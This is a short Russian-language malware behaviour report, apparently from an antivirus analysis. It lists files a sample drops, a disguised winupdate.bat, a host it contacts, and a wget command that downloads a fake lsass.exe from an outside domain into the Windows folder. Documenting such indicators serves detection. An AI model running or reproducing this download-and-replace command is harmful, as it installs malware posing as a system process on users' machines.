Техническая информация
- %WINDIR%\lsass.exe (загружен из сети Интернет)
- %WINDIR%\wget.exe dark.geoporno.net/lsass.exe %WINDIR%\lsass.exe
- <SYSTEM32>\xcopy.exe wget.exe %WINDIR%
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\winupdate.bat" <Текущая директория>\"
- %WINDIR%\wget.exe
- %WINDIR%\lsass.exe
- %TEMP%\1.tmp\winupdate.bat
- %TEMP%\1.tmp\wget.exe
- 'da##.#eoporno.net':80
- da##.#eoporno.net/lsass.exe
- DNS ASK da##.#eoporno.net
- '<IP-адрес в локальной сети>':1036
- ClassName: 'Shell_TrayWnd' WindowName: ''